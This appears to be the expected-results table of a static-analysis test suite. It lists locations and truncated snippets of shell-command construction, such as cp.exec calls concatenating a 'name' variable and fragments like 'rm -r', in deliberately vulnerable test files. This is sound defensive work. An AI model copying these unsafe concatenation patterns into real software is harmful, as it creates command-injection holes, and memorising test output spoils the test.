| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:10:89:35 | ["rm -r ... in(" ") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:91:10:91:49 | ["rm -r ... in(" ") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:93:2:93:33 | cp.exec ... name]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:96:12:96:26 | require("util") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:2:98:40 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:98:10:98:39 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:2:100:42 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:100:10:100:41 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:2:102:51 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:102:10:102:50 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:2:104:41 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:2:108:46 | cp.exec ... name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:26 | require("printf") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:108:10:108:45 | require ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:112:2:112:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:114:7:114:23 | isValidName(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:117:2:117:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:121:2:121:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:123:7:123:22 | isSafeName(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:126:2:126:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:3:131:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:138:3:138:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:159:2:159:23 | cp.spaw ... gs, cb) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:165:3:165:30 | ['/C', ... (args2) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:181:21:181:46 | name.re ... "'\\''") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:182:2:182:28 | cp.exec ... broken) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | require("path") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:187:2:187:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:189:7:189:22 | path.exist(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:190:3:190:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:2:193:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:197:2:197:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:199:6:199:36 | /[^A-Za ... t(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:200:3:200:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:202:3:202:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:207:2:207:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | /^[A-Za ... t(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:217:2:217:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:219:7:219:37 | /^([a-z ... t(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:220:3:220:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:221:3:221:18 | process.exit(-1) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:2:224:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:231:3:231:23 | path.ac ... c(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:236:2:236:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:13:241:36 | s.repla ... '\\\\''") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:242:32 | s.repla ... /g, '') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:242:7:243:28 | s.repla ... "\\\\'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:249:2:249:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:253:2:253:29 | cp.exec ... leaned) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:256:10:256:22 | require("fs") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:261:3:261:34 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:264:2:264:33 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:268:2:268:33 | cp.exec ... ersion) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:12:287:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:288:12:288:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:289:12:289:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:290:12:290:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:291:12:291:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:292:12:292:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:293:12:293:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:294:12:294:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:295:12:295:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:296:12:296:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:297:12:297:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:298:12:298:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:299:12:299:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:300:12:300:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:301:12:301:35 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:302:12:302:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:303:12:303:36 | result. ... /g, "") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:308:3:308:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:311:3:311:32 | cp.exec ... itized) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:315:2:315:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:318:3:318:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:320:3:320:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:326:2:326:13 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:336:2:336:32 | cp.exec ... test")) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:340:2:340:27 | cp.exec ... id(n)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:345:3:345:24 | cp.exec ... " + n) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:350:2:350:26 | cp.exec ... + safe) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:351:2:351:28 | cp.exec ... unsafe) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:354:1:358:2 | Object. ... ;\\n\\t}\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:356:10:356:40 | boundPr ... "safe") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:367:3:367:18 | cp.exec(command) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:406:2:406:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:409:2:409:31 | cp.exec ... itized) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:412:12:412:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:415:2:415:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:417:2:417:66 | cp.exec ... => {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:418:2:418:45 | cp.spaw ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:419:2:419:52 | cp.exec ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:420:2:420:49 | cp.spaw ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:426:2:426:15 | arr.push(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:433:6:433:16 | something() |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:3:434:21 | arr.push('convert') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:440:17:440:40 | require ... ecute") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:453:1:470:1 | Object. ... \\t)\\n\\t)\\n) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:455:2:469:2 | Object. ... \\n\\t\\t)\\n\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:457:25 | Object. ... yFuncs) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:457:3:468:3 | Object. ... \\t{}\\n\\t\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:458:31:466:4 | Object. ... },\\n\\t\\t\\t) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:472:14:472:28 | require('path') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:473:21:473:35 | require('util') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:14:475:53 | promisi ... ).exec) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:478:17:478:62 | path.jo ... ry -v') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:479:12:479:20 | exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:485:2:485:20 | cp.exec(cmd + args) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:490:2:490:13 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:499:3:499:35 | MyThing ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:504:11:504:33 | require ... orted') |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:510:2:510:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:512:6:512:16 | isNaN(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:513:3:513:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:515:3:515:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:6:518:26 | isNaN(p ... (name)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:518:12:518:25 | parseInt(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:519:3:519:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:521:3:521:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:524:6:524:17 | isNaN(+name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:525:3:525:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:527:3:527:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | isNaN(p ... e, 10)) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | parseInt(name, 10) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:537:3:537:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:539:3:539:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:542:6:542:20 | isNaN(name \| 0) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:543:3:543:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:3:545:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | require("./bla") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | require("./subsub") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:1:12:1:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:2:1:6:2 | define( ... };\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amd.js:4:13:4:31 | require("./amdSub") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:1:12:1:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:11:22:11:40 | require("./amd.js") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:1:15:1:32 | require('express') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:2:21:2:44 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | require('fs') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | express() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exec("c ... ut) {}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exec("c ... ut);\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:13:2:13:17 | console.log(out) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:29 | execSyn ... uinfo') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:16:1:16:40 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:18:1:18:26 | execSyn ... path}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:20:1:20:36 | execSyn ... wc -l') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:38 | execSyn ... o/bar') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:22:1:22:49 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:35 | execSyn ... o/bar`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:24:1:24:46 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:26:1:26:58 | exec(`c ... t) { }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:28:1:28:39 | execSyn ... 1000}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:30:1:30:64 | exec('c ... t) { }) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:32:1:32:34 | execSyn ... path}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:34:1:34:54 | execSyn ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:36:1:36:77 | execSyn ... utf8'}) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:43 | execSyn ... r/baz') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:38:1:38:54 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:40 | execSyn ... path}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:1:40:51 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | execSyn ... File}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | files.join(' ') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | execSyn ... ' ')}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | files.join(' ') |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exec("c ... name") |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | execSyn ... tool}`) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:31 | execSyn ... + file) |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:51:9:51:42 | execSyn ... tring() |
| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:54:1:54:39 | execSyn ... + "'") |
